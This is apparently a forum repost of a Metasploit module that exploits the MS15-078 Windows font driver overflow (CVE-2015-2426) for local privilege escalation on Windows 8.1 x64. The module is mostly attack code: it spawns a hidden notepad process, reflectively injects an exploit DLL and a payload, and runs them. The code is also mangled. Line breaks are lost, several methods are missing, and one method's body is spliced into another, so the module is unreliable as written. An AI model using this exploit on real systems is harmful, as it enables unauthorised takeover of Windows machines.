Leaderboard

This module requires Metasploit require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ManualRanking WIN32K_VERSIONS = [ '6.3.9600.17393', '6.3.9600.17630', '6.3.9600.17694', '6.3.9600.17796', '6.3.9600.17837', '6.3.9600.17915' ] NT_VERSIONS = [ '6.3.9600.17415', '6.3.9600.17630', '6.3.9600.17668', '6.3.9600.17936' ] include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow', 'Description' => %q{ This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing a malformed font. The vulnerability was exploited by the hacking team and disclosed on the july data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64. }, 'License' => MSF_LICENSE, 'Author' => [ 'Eugene Ching', # vulnerability discovery and exploit 'Mateusz Jurczyk', # vulnerability discovery 'Cedric Halbronn', # vulnerability and exploit analysis 'juan vazquez' # msf module ], 'Arch' => ARCH_X86_64, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows 8.1 x64', { } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2015-2426'], ['CVE', '2015-2433'], ['MSB', 'MS15-078'], ['MSB', 'MS15-080'], ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'], ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'], ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'], ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480'] ], 'DisclosureDate' => 'Jul 11 2015', 'DefaultTarget' => 0 })) end def patch_win32k_offsets(dll) @win32k_offsets.nil? set_nt_offsets fail_with(Failure::NoTarget, 'ntoskrnl.exe offsets not available') if @nt_offsets.nil? begin print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Sandboxes could not allow to create a new process # stdapi_sys_process_execute: Operation failed: Access is denied. print_status('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll') library_path = ::File.expand_path(library_path) print_status("Reflectively injecting the exploit DLL into #{process.pid}...") dll = '' ::File.open(library_path, 'rb') { |f| dll = f.read } patch_win32k_offsets(dll) patch_nt_offsets(dll) exploit_mem, offset = inject_dll_data_into_process(process, dll) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end sursa: bugsearch.net